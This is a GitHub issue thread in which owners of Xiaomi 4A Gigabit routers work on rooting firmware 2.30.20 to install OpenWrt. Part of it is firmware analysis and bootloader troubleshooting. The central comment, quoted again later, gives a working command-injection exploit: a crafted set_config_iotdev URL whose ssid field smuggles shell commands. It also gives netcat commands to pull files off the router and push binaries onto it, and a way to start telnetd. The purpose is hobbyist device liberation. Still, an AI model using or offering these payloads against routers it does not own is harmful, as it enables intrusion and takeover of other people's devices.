acecilia/OpenWRTInvasion #141: Not working R4A (Xiaomi 4a Gigabit) 2.30.20

teammate100, 2022-09-01:
Script appears to work, but ftp/ssh/telnet can not connect.
However it gets stok automatically.
This is Ubuntu 20.04.3 completely stock.
I also tried with option 2 to download needed files from remote github repository, no difference.

*Please note the Docker would not build correctly with either docker or sudo docker, so I git cloned OpenWRTInvasion and put my OpenWRT firmware in there.

`$ python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: OpenWRTInvasion
There two options to provide the files needed for invasion:
   1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
   2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)1
****************
router_ip_address: 192.168.31.1
stok: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
file provider: local file server
****************
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49557. root='script_tools'
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.31.1
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
* ftp: using a program like cyberduck`

Then I try
`telnet 192.168.31.1`
But I get 
`telnet: connect to address 192.168.31.1: Connection refused`
same with ssh and ftp.

I assume this person had success with this version 2.30.20, but their advice isn't clear.
https://github.com/acecilia/OpenWRTInvasion/issues/135#issuecomment-1186216223

acecilia, 2022-09-01:
Seems your machine cannot connect to the router. I cant help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible

teammate100, 2022-09-01:
> Seems your machine cannot connect to the router. I cant help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible

This is not the issue, because I have no problem connecting to the router with DHCP or manual IP (192.168.31.2). The network is also working perfectly with modem connected to WAN.
No WIFI used, this is direct ethernet cable  between the PC and the router.

I also tried power cycling the router several times and doing the script immediately upon bootup, no difference.

I also tried in Windows 10 with Docker, no difference.

My 4a Gigabit is manufactured 07/2022.  Is there something I can check for you on the router itself?

MosesCN, 2022-09-05:
same situation, all works well until connecting to the router with telnet or ssh, any solution? thx

Maxlinn, 2022-09-07:
same situation, i tried to invade in several versions of  this tool, but none of them could allow me to connect through telnet.

acecilia, 2022-09-08:
Version 3.0.10 is reported to work: https://github.com/acecilia/OpenWRTInvasion/issues/145

acecilia, 2022-09-09:
Added information to readme, thanks!

closed 2022-09-09 by acecilia

tangmingxing1988, 2022-09-15:
Maybe the security issue has been fixed officially, I uncomment the result of upload code, and got the following error:
`start uploading config file...
{"code":1629,"msg":"解压失败，可能文件已经损坏"}`

Means "uncompressed failed, maybe the file is broken"

LordPinhead, 2022-09-17:
I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same, now I have to look which file will be executed for the c_upload api endpoint. The hack is pretty simple, as long we get a few files on the router

tangmingxing1988, 2022-09-18:
> I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same, now I have to look which file will be [...]

I am afraid it's not about c_upload, maybe testing net speed will not evaluate the command in the url anymore, so it will be hard, or even impossible.

Anyway, it's my opinion, good luck.

LordPinhead, 2022-09-18:
I will see what happens. If everything fails, we have to programm the chip the hardcore way and downgrade it to a vulnerable firmware or openwrt directly

LordPinhead, 2022-09-19:
So, I looked up what the vulnerable script was, its /usr/bin/upload_speedtest, or was. The upload saved a file in /tmp/ named speedtest_urls.xml with the script and /usr/bin/speedtest would execute the wget command and that, loaded the script. Sadly, the code changed:

2.28.69 and 

`
local cfg = {
....
	['xmlfile'] = "/usr/share/speedtest.xml",
        ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
filexml = io.open(cfg.tmp_speedtest_xml)
if filexml then
    filexml:close()
    filename = cfg.tmp_speedtest_xml
else
    filename = cfg.xmlfile
end
filename = cfg.xmlfile
`

To the new 2.30.20:
`
local cfg = {
....
	['xmlfile'] = "/usr/share/speedtest.xml",
        ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
--filexml = io.open(cfg.tmp_speedtest_xml)
--if filexml then
--    filexml:close()
--    filename = cfg.tmp_speedtest_xml
--else
--    filename = cfg.xmlfile
--end
filename = cfg.xmlfile
`

and that's the reason the attack is not working anymore. (For noncoders, they did not load the /tmp file, the use the internal file that is in the firmware and we can't change that)

I upload the bindump of 2.30.20 and we could look for another bug, but atm, our best solution would be downgrading the router to a vulnerable version or directly install OpenWRT with a programmer. 

Extracted dump with Binwalk (on Linux, you need root or sudo -s)
https://drive.proton.me/urls/CGCNWSMQB0#bkj9NIVPIR06

Direct Bin dump from the chip
https://drive.proton.me/urls/58Q1BHMN18#GKbX5gTA6XBS

I also tried to activate the serial console, but it refused the new parameters, here is the serial console output
https://drive.proton.me/urls/AF1Z9XA290#ct6pXZqm6ijn

Changed uboot code:
`
bootcmd=mtkautoboot
bootdelay=9
stdin=serial
stdout=serial
stderr=serial
flag_boot_rootfs=0
wl1_radio=1
model=R4AV2
mode=Router
no_wifi_dev_times=0
boot_wait=on
uart_en=0
telnet_en=1
CountryCode=CN
color=101
ssh_en=0
nv_wan_type=static
flag_boot_success=1
flag_try_sys1_failed=0
flag_try_sys2_failed=0
normal_firmware_md5=11b6c8523198ac50137219388168d79d
flag_boot_type=2
flag_ota_reboot=0
flag_last_success=0
restore_defaults=0
Router_unconfigured=0
`
Telnet was activated, but does nothing, bootdelay to 9 seconds and bootwait to on. But nope, no serial console working.
Does somebody have an old bindump I could play with?

tangmingxing1988, 2022-09-19:
> Does somebody have an old bindump I could play with? 

Thanks for your efforts, and I can't make it work for serial console, so the boot delay won't let you download file from tftp?

LordPinhead, 2022-09-19:
> > Does somebody have an old bindump I could play with?
> 
> Thanks for your efforts, and I can't make it work for serial console, so the boot delay won't let you download file from tftp?

Sadly no. First:

`U-Boot 2018.09 (Feb 22 2022 - 03:57:56 +0000), Build: jenkins-common_router_openwrt_bash_ota_publish-73

CPU:   MediaTek MT7621AT ver 1, eco 3
Clocks: CPU: 880MHz, DDR: 600MHz, Bus: 220MHz, XTAL: 40MHz
Model: MediaTek MT7621 reference board
DRAM:  128 MiB
pcie reset control...
gpio data reg:0xfffd601a
gpio data reg:0xfff5601e
gpio data reg:0xfffd601e
Loading Environment from SPI Flash... SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
*** Warning - bad CRC, using default environment

In:    uartlite0@1e000c00
Out:   uartlite0@1e000c00
Err:   uartlite0@1e000c00
Net:   
Warning: eth@1e100000 (eth0) using random MAC address - 82:73:78:2e:b6:69
eth0: eth@1e100000

restore_defaults:<NULL>
boot_wait is off !
Booting System 1 @00xBFD80000 
SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
bootargs: console=ttyS0,115200 uart_en=0 factory_mode=0 mem=128m `

You see the "Warning - bad crc", this happens when I modify the bin dump and flash it onto the router and it boots.

I've tried to downgrade the firmware to various versions, everytime, the router downloads the img from my PC and then says "nope, magic hex number wrong" and stops there.

I did not try a squash or root fs of OpenWRT though, but I guess it's the same issue.

ATM, I'm searching for some bugs. I found something about the config backup, it's encrypted with AES, but the key in /squash-fs/etc/config/cfgbackup is just a hint, I need the cipher and if a key is somewhere or a salt. The LUA files may have it, but I didn't find anything there yet. My hope is, I can inject code via the upload of a config.

But this will take some time. I'm unhappy myself, it's the second router in 2 weeks I can't get running with OpenWRT :(

tangmingxing1988, 2022-09-22:
> But this will take some time. I'm unhappy myself, it's the second router in 2 weeks I can't get running with OpenWRT :(

I almost come to here every day to see if there is any update. Waiting for your progress, my friend 👍

tangmingxing1988, 2022-09-27:
To anyone who is interested, here is my last thought about this, and maybe it's wrong, just for advise:

The problem is not only about hacking into the system, but the 5g chip has changed(now mt7613ben), so the Openwrt firmware is not suitable anymore. We not only need the new hacking way, but also new firmware.

LordPinhead, 2022-09-27:
That would suck tbh. If the chip is not supported by the Linux Kernel. We could ask in the OpenWrt Forum for it, but so far, I found no way around it. But I have more projects running, I can't put that much time into this.

Making a 21.x image with the Kernel Driver would be something, V3 need. But that's maybe the reason why downgrading the firmware did not work.

RadioOperator, 2022-09-28:
where I can download the 2.30.20 factory firmware?  
My 4AG is 2.28.69 chinese version, works no problems.

RadioOperator, 2022-09-28:
Then 2.30.20 cannot downgrade to the 2.28.69?

LordPinhead, 2022-09-28:
I guess no, because I couldn't do it with any method I found. I tried the tftp debricking version too. The box loads the image, but then stops and says "the magic number is wrong".
That's why I search for firmware errors to get somehow access.

Changing the binary image is not working btw, I tried and it recovered the default config. The bootloader is the problem here.

RadioOperator, 2022-09-28:
then, could we re-flash the bootloader from serial connection?
I can dump my 4AG bootloader bin code from openwrt (mtd0) you.

LordPinhead, 2022-09-28:
I don't know, I have a chip programmer to do it, you can also test my dump on your chip, but you can also put a chip dump somewhere for me, I'll try it.

RadioOperator, 2022-09-28:
I just flash my 4AG from openwrt back to factory image via TFTP server, failed on v3.0.24 (File too large! / Header check error! / 
Image verify failed! / ========Upgrade fail!======== ).

but success on v2.28.69, then use [OpenWRTInvasion](https://github.com/acecilia/OpenWRTInvasion) OK!

RadioOperator, 2022-09-28:
here is my 4AG bootloader bin code downloaded from openwrt (mtd0), pls note maybe brick your device permanently, on your own risks.
[OpenWrt.mtd0.zip](https://github.com/acecilia/OpenWRTInvasion/files/9664741/OpenWrt.mtd0.zip)

RadioOperator, 2022-09-28:
@tangmingxing1988  hi,  after my 4AG connected internet by WAN cable, my Ubuntu PC:

1. LAN to Eth1, internet speed 800 ~ 900Mbps
2. 2G WiFi connection, internet speed 15 ~ 20Mbps
3. 5G WiFi connection, internet speed 150 ~ 200Mbps
4. forgot the original version, maybe 2.28.62 or earlier

tested the internet speed on https://speedtest.ofca.gov.hk/speedtest.html

LordPinhead, 2022-09-29:
> @LordPinhead , here is my 4AG bootloader bin code downloaded from openwrt Luci GUI (mtd0), pls note maybe brick your device permanently, on your own risks. [OpenWrt.mtd0.zip](https://github.com/acecilia/OpenWRTInvasion/files/9664741/OpenWrt.mtd0.zip)
> 
> My 4AG flash IC is GD25Q128C.

Awesome, I will try it tomorrow when I'm home.

The chip should be the same, so this would be a way to downgrade for people until we find a vulnerability

RadioOperator, 2022-10-02:
`@acecilia  @LordPinhead @tangmingxing1988 @teammate100` , all , this version is new 4AG!!!!!!,  we could call it Xiaomi 4A Gigabit V2, I received a reference model no generated from the software: R4AV2.
The critical issues is the V2 hardware changed somewhere, so we need a deep study and special development.

I burnt `@LordPinhead ` dump code on my 4AG, I can login the admin page, but:
1. LED not right
2. WAN not work
3. ETH1 not work
4. ETH2 OK
5. WiFi seems OK

The factory firmware, v2.30.20, both bootloader and v2.30.20,  should be from new tools, not same as the old one.

RadioOperator, 2022-10-03:
`@LordPinhead` hi, suggest you roughly comparing the PCB and layout first, maybe CPU / ICs part no changed to new versions.

RadioOperator, 2022-10-04:
Hi, the new V2 owners, please confirm the label shows device m/n is R4A printed on the back.

Please check here:
https://forum.openwrt.org/t/support-for-xiaomi-router-ac1200-rb02/124962/4

The V2 hardware, maybe same as Xiaomi AC1200 (RB02).
And the SSH info for RB02 / R4AV2:
https://4pda.to/forum/index.php?showtopic=988197&st=9960#entry117646422

Here is the openwrt forum related topic:
https://forum.openwrt.org/t/new-xiaomi-4a-gigabit-v2-on-the-market-openwrt-not-support-yet/138592

wbs306, 2022-10-08:
@tangmingxing1988 @RadioOperator @LordPinhead  Hi, I compiled a new openwrt firmware for R4AV2 and everything works fine except the leds, but it needs a programmer to flash it.

mark4z, 2022-10-08:
> @tangmingxing1988 @RadioOperator @LordPinhead Hi, I compiled a new openwrt firmware for R4AV2 and everything works fine except the leds, but it needs a programmer to flash it.

so, how to get shell for this one?

wbs306, 2022-10-08:
> 

Idk😢 It's hard to get shell for me

RadioOperator, 2022-10-08:
good new, what diffs on the hw/sw?

wbs306, 2022-10-08:
> good news, what diffs on the hw/sw?

It seems the V2 has the same hardware with RB02
[image]

ZHDI-1, 2022-10-24:
> > good news, what diffs on the hw/sw?
> 
> It seems the V2 has the same hardware with RB02 [image]

hi, did you get the 5G signal, seems like RB02 works with mt7663 not mt7613

wbs306, 2022-10-26:
@ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: https://github.com/wbs306/lede/commit/146597f33667472352c25aabd05849f2ba5bfb3d

ZHDI-1, 2022-10-27:
> @ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: https://github.com/wbs306/lede/commit/146597f33667472352c25aabd05849f2ba5bfb3d

I find a commit [openwrt](https://github.com/openwrt/openwrt/commit/81b59efefd4c88187a519d09129c97e63900731e) shows 76x3 series use same divers, so R4AV2 named 7613 but use 7663 firmware, thanks for your dts commit, I will try it.

ZHDI-1, 2022-10-27:
> So, I looked up what the vulnerable script was. Its /usr/bin/upload_speedtest, or was. The upload saved a file in /tmp/ named speedtest_urls.xml with the script and /usr/bin/speedtest would execute the wget command and that, loaded the script. Sadly, the code changed:
> 
> 
> 
> 2.28.69 and 
> 
> 
> 
> 
> 
> `
> 
> local cfg = {
> 
> ....
> 
> 	['xmlfile'] = "/usr/share/speedtest.xml",
> 
>         ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
> 
> }
> 
> 
> 
> local filename = ""
> 
> filexml = io.open(cfg.tmp_speedtest_xml)
> 
> if filexml then
> 
>     filexml:close()
> 
>     filename = cfg.tmp_speedtest_xml
> 
> else
> 
>     filename = cfg.xmlfile
> 
> end
> 
> filename = cfg.xmlfile
> 
> `
> 
> 
> 
> To the new 2.30.20:
> 
> `
> 
> local cfg = {
> 
> ....
> 
> 	['xmlfile'] = "/usr/share/speedtest.xml",
> 
>         ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
> 
> }
> 
> 
> 
> local filename = ""
> 
> --filexml = io.open(cfg.tmp_speedtest_xml)
> 
> --if filexml then
> 
> --    filexml:close()
> 
> --    filename = cfg.tmp_speedtest_xml
> 
> --else
> 
> --    filename = cfg.xmlfile
> 
> --end
> 
> filename = cfg.xmlfile
> 
> `
> 
> 
> 
> And that's the reason the attack is not working anymore. (For noncoders, they did not load the /tmp file, they use the internal file that is in the firmware, and we can't change that)
> 
> 
> 
> I upload the bindump of 2.30.20, and we could look for another bug, but atm, our best solution would be downgrading the router to a vulnerable version or directly install OpenWRT with a programmer. 
> 
> 
> 
> Extracted dump with Binwalk (on Linux, you need root or sudo -s)
> 
> https://drive.proton.me/urls/CGCNWSMQB0#bkj9NIVPIR06
> 
> 
> 
> Direct Bin dump from the chip
> 
> https://drive.proton.me/urls/58Q1BHMN18#GKbX5gTA6XBS
> 
> 
> 
> I also tried to activate the serial console, but it refused the new parameters, here is the serial console output
> 
> https://drive.proton.me/urls/AF1Z9XA290#ct6pXZqm6ijn
> 
> 
> 
> Changed uboot code:
> 
> `
> 
> bootcmd=mtkautoboot
> 
> bootdelay=9
> 
> stdin=serial
> 
> stdout=serial
> 
> stderr=serial
> 
> flag_boot_rootfs=0
> 
> wl1_radio=1
> 
> model=R4AV2
> 
> mode=Router
> 
> no_wifi_dev_times=0
> 
> boot_wait=on
> 
> uart_en=0
> 
> telnet_en=1
> 
> CountryCode=CN
> 
> color=101
> 
> ssh_en=0
> 
> nv_wan_type=static
> 
> flag_boot_success=1
> 
> flag_try_sys1_failed=0
> 
> flag_try_sys2_failed=0
> 
> normal_firmware_md5=11b6c8523198ac50137219388168d79d
> 
> flag_boot_type=2
> 
> flag_ota_reboot=0
> 
> flag_last_success=0
> 
> restore_defaults=0
> 
> Router_unconfigured=0
> 
> `
> 
> Telnet was activated, but does nothing, bootdelay to 9 seconds and bootwait to on. But nope, no serial console working.
> 
> Does somebody have an old bindump I could play with? 

About the last issue, you missed crc32 check at the before of uboot settings binary code, you can write a sample script to check how many blocks this crc value check

vanyasem, 2022-10-30:
## I managed to get shell access on this device.

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to `netcat` on Windows.

### Introduction

I am on firmware `MiWiFi 稳定版 2.30.20`

This firmware has the speedtest exploit patched, but it still has the `set_config_iotdev` remote exec exploit:

In short, if you make a `get` request (open the link in the browser) to `http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A` , the command in `{{{URL_ENCODED_COMMAND}}}` gets executed.

By default, `{{{ROUTER_IP}}}` is `192.168.31.1` (default gateway in network settings of your PC connected to the router). `{{{STOK}}}` can be found in the URL by logging into the admin console of the router (`http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router`). And, well, `{{{URL_ENCODED_COMMAND}}}` is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)

You can verify the exploit by executing the `reboot` command: `http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A` - the router will reboot.

Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

### NetCat saves the day

But! `nc` (`netcat`/`ncat`) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). `ncat` can be downloaded here https://nmap.org/download

**To download a file from the router:**
On your computer: run `ncat -l 1234 > downloaded_file_name.txt`
On your router: run `nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router'` (via the exploit mentioned above)
You can test that by downloading `/etc/hosts` from the router.

You should replace `{{{YOUR_PC_IP_ADDR}}}` with a local IP of your computer (`192.168.31.X`)

**To upload a file to the router:**
On your computer: run `ncat -l 1234 < file_to_upload_from_your_pc.txt`
On your router: run `nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file'` (via the exploit mentioned above)
You can test it by uploading a small file from your PC to `/tmp/file.txt`, and then download it back via the method described above.

But! Here's a catch. From my testing, the router can only receive files up to 8Kb via `nc`. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

### Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to `base64` first. You can do it here, by example: https://base64.guru/converter/encode/file

To split the resulting base64 file into pieces, run `split -b 6K base64.txt` on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)

The result of this command will be a folder full of files named `xaa`, `xab`, `xac`... I uploaded all of them to a separate folder on the router (`/tmp/split`), using the ncat method described above.

Then, I had to combine them back into a single file. To do that, run `cat /tmp/split/x* > /tmp/split/final.txt` on your router.

To decode a base64 encoded file into a binary, run `base64 -d /tmp/split/final.txt > /tmp/split/final` on your router.

To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running `md5sum /tmp/split/final` on the router.

Then, make the file executable by running `chmod +x /tmp/split/final` on your router.

And finally, the file is ready to be executed.

### Shell access

In my case, I uploaded a precompiled `busybox` binary with telnet supported.

I ran it `/tmp/split2/final telnetd` on my router, and the `telnet` server was successfully launched.

Then, I connected to it by running `telnet 192.168.31.1` on my PC.

[image]

### Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads: 
[upl_file.py.zip](https://github.com/acecilia/OpenWRTInvasion/files/9894798/upl_file.py.zip)

To use it, first, edit the script to configure your PC's IP addr and router's `STOK`. Then, make a `/tmp/split` folder by executing `mkdir /tmp/split/` on the router. Create a new folder on your PC called `split` in the same folder where your script is, and put all `xaa`, `xab`, `xac`... files there. Install `requests` module for python3 if not already installed by running `pip3 install requests --user` on your PC. And finally, run the script by executing `python3 upl_file.py` on your PC

I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.

Known working busybox binary: [busybox.zip](https://github.com/acecilia/OpenWRTInvasion/files/9894805/busybox.zip)

For the lazy ones, here's an already split busybox binary: [split_busybox.zip](https://github.com/acecilia/OpenWRTInvasion/files/9894810/split_busybox.zip)

vanyasem, 2022-10-30:
personal ping to @LordPinhead , @RadioOperator ,  @MosesCN , @Maxlinn

LordPinhead, 2022-10-30:
Now that is surprising. I knew of the old exploit, but did not test it. I thought there is a reason the speedtest one would be used.

But that's great news. I guess the netcat transfer limit could be avoided with a simple bash script that gets executed? Download the binary from a server, and that's it. Its 5am here, I get a few hours of sleep and will install the old firmware again to test it out!

vanyasem, 2022-10-30:
@LordPinhead I did not want to connect the router to the internet, which is why I haven't tried downloading from the internet. Haven't tested that, but theoretically should work

vanyasem, 2022-10-30:
@wbs306 do you mind sharing the config that you used to build LEDE from your fork?

LordPinhead, 2022-10-30:
> @LordPinhead I did not want to connect the router to the internet, which is why I haven't tried downloading from the internet. Haven't tested that, but theoretically should work

How about starting a temporary local webserver in python? I'm trying the exploit now and code a bit and let you know.

LordPinhead, 2022-10-30:
@vanyasem @acecilia I made a pull request. A vanilla router was successfully rooted by this multiple times. No need for internet access. You only need the router ip to the interface, the ip of the box you are using, webinterface password, the rest is working like normal.

The script is basically packing what we need for root access, starts a local web server, the files are loaded to the router and the scripts executed.

wbs306, 2022-10-31:
> @wbs306 do you mind sharing the **config** that you used to build LEDE from your fork? or maybe even precompiled binaries known to work

There's no different with R4AG, so you can try this config file to build. https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG/blob/main/r4a.config

vanyasem, 2022-11-02:
@cuanblane first of all, there's a new improved version of the script in a pull request. My message was technical, not intended for users

Second of all, address already in use means that a previous instance on ncat is already running, which indicated that your router **couldn't find your computer and connect to it**. Most likely you messed up STOK or IP configurations. Anyways, please, don't use this script, a much better way was found here https://github.com/acecilia/OpenWRTInvasion/pull/155

cuanblane, 2022-11-02:
Thanks @vanyasem 
Yea something is probably not set right - although the reboot test worked using the remote exec exploit. 
Thanks for replying mate, I appreciate it, I'll try out the v2 script

ivan-semkin-gismart, 2022-11-03:
@cuanblane the reboot test is meant to indicate that **your PC** can connect to the router, not vice versa. I don't know how WSL works, but AFAIK WSL v2 uses a VM and has NAT for it's networking, hence your router cannot detect it, because the IP is incorrect

v2 should work natively on Windows, only requiring Python to be installed on the machine

mark4z, 2022-11-03:
> ## I managed to get shell access on this device without a chip programmer
> 
> 
> 
> The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to `netcat` on Windows.
> 
> 
> 
> ### Introduction
> 
> 
> 
> I am on R4AV2 firmware `MiWiFi 稳定版 2.30.20`
> 
> 
> 
> This firmware has the speedtest exploit patched, but it still has the `set_config_iotdev` remote exec exploit:
> 
> 
> 
> In short, if you make a `get` request (open the link in the browser) to `http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A` , the command in `{{{URL_ENCODED_COMMAND}}}` gets executed.
> 
> 
> 
> By default, `{{{ROUTER_IP}}}` is `192.168.31.1` (default gateway in network settings of your PC connected to the router). `{{{STOK}}}` can be found in the URL by logging into the admin console of the router (`http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router`). And, well, `{{{URL_ENCODED_COMMAND}}}` is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)
> 
> 
> 
> You can verify the exploit by executing the `reboot` command: `http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A` - the router will reboot.
> 
> 
> 
> Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.
> 
> 
> 
> ### NetCat saves the day
> 
> 
> 
> But! `nc` (`netcat`/`ncat`) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). `ncat` can be downloaded here https://nmap.org/download
> 
> 
> 
> **To download a file from the router:**
> 
> On your computer: run `ncat -l 1234 > downloaded_file_name.txt`
> 
> On your router: run `nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router'` (via the exploit mentioned above)
> 
> You can test that by downloading `/etc/hosts` from the router.
> 
> 
> 
> You should replace `{{{YOUR_PC_IP_ADDR}}}` with a local IP of your computer (`192.168.31.X`)
> 
> 
> 
> **To upload a file to the router:**
> 
> On your computer: run `ncat -l 1234 < file_to_upload_from_your_pc.txt`
> 
> On your router: run `nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file'` (via the exploit mentioned above)
> 
> You can test it by uploading a small file from your PC to `/tmp/file.txt`, and then download it back via the method described above.
> 
> 
> 
> But! Here's a catch. From my testing, the router can only receive files up to 8Kb via `nc`. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.
> 
> 
> 
> ### Splitting files
> 
> 
> 
> As I don't like splitting raw binaries, I decided to convert my binary to `base64` first. You can do it here, by example: https://base64.guru/converter/encode/file
> 
> 
> 
> To split the resulting base64 file into pieces, run `split -b 6K base64.txt` on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)
> 
> 
> 
> The result of this command will be a folder full of files named `xaa`, `xab`, `xac`... I uploaded all of them to a separate folder on the router (`/tmp/split`), using the ncat method described above.
> 
> 
> 
> Then, I had to combine them back into a single file. To do that, run `cat /tmp/split/x* > /tmp/split/final.txt` on your router.
> 
> 
> 
> To decode a base64 encoded file into a binary, run `base64 -d /tmp/split/final.txt > /tmp/split/final` on your router.
> 
> 
> 
> To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running `md5sum /tmp/split/final` on the router.
> 
> 
> 
> Then, make the file executable by running `chmod +x /tmp/split/final` on your router.
> 
> 
> 
> And finally, the file is ready to be executed.
> 
> 
> 
> ### Shell access
> 
> 
> 
> In my case, I uploaded a precompiled `busybox` binary with telnet supported.
> 
> 
> 
> I ran it `/tmp/split/final telnetd` on my router, and the `telnet` server was successfully launched.
> 
> 
> 
> Then, I connected to it by running `telnet 192.168.31.1` on my PC.
> 
> 
> 
> [image]
> 
> 
> 
> ### Afterthoughts
> 
> 
> 
> To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads: 
> 
> [upl_file.py.zip](https://github.com/acecilia/OpenWRTInvasion/files/9894798/upl_file.py.zip)
> 
> 
> 
> To use it, first, edit the script to configure your PC's IP addr and router's `STOK`. Then, make a `/tmp/split` folder by executing `mkdir /tmp/split/` on the router. Create a new folder on your PC called `split` in the same folder where your script is, and put all `xaa`, `xab`, `xac`... files there. Install `requests` module for python3 if not already installed by running `pip3 install requests --user` on your PC. And finally, run the script by executing `python3 upl_file.py` on your PC
> 
> 
> 
> I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.
> 
> 
> 
> Known working busybox binary: [busybox.zip](https://github.com/acecilia/OpenWRTInvasion/files/9894805/busybox.zip)
> 
> 
> 
> For the lazy ones, here's an already split busybox binary: [split_busybox.zip](https://github.com/acecilia/OpenWRTInvasion/files/9894810/split_busybox.zip)
> 
> 

Good job! I almost give up for this router.
Nice Russia gay!

mark4z, 2022-11-03:
> Thanks @vanyasem 
> 
> Yea something is probably not set right - although the reboot test worked using the remote exec exploit. 
> 
> Thanks for replying mate, I appreciate it, I'll try out the v2 script 

Just reboot and try again

mark4z, 2022-11-03:
Now we need a firmware for r4ag v2🤓

MrTaiKe, 2022-11-04:
> @ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: [wbs306/lede@146597f](https://github.com/wbs306/lede/commit/146597f33667472352c25aabd05849f2ba5bfb3d)

@wbs306 
I saw you made 2 commits: First for R4AV2 and 2nd for Breed Bootloader.  Looks like that you intended to use Breed, Do you know which BREED bin can be used for **_R4AV2_**?  
https://breed.hackpascal.net
[image]

_(Note: I learnt from your Action page referring to a link said: R4A V1 =R3G V2 小米R4A千兆版与小米R3G V2是一样的货 https://www.right.com.cn/FORUM/thread-4052254-1-1.html)_ 

Thank you!

wbs306, 2022-11-05:
@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's `breed-mt7621-pbr-m1.bin `

MrTaiKe, 2022-11-06:
> @MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's `breed-mt7621-pbr-m1.bin`

@wbs306 Thank you very much !!! and Please see https://github.com/acecilia/OpenWRTInvasion/pull/155#issuecomment-1304848086,  

@mark4z Check it out! Let me know! Thx!

mark4z, 2022-11-07:
> > @MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's `breed-mt7621-pbr-m1.bin`
> 
> 
> 
> @wbs306 Thank you very much !!! and Please see https://github.com/acecilia/OpenWRTInvasion/pull/155#issuecomment-1304848086,  
> 
> 
> 
> @mark4z Check it out! Let me know! Thx!

可以教教我怎么刷吗

MrTaiKe, 2022-11-07:
> 可以教教我怎么刷吗
@mark4z   請看看我那個連結裡面內容, 有教  [#155 (comment)](https://github.com/acecilia/OpenWRTInvasion/pull/155#issuecomment-1304848086),

fengjiaqi927, 2022-11-09:
> @MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's `breed-mt7621-pbr-m1.bin `

thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20).
first, I have downloaded the code with the link below:
[https://github.com/LordPinhead/OpenWRTInvasion]
and successfully got the console via WSL in windows. 
Then I used mobaxterm to upload breed-mt7621-pbr-m1.bin([https://breed.hackpascal.net/]) to path /tmp 
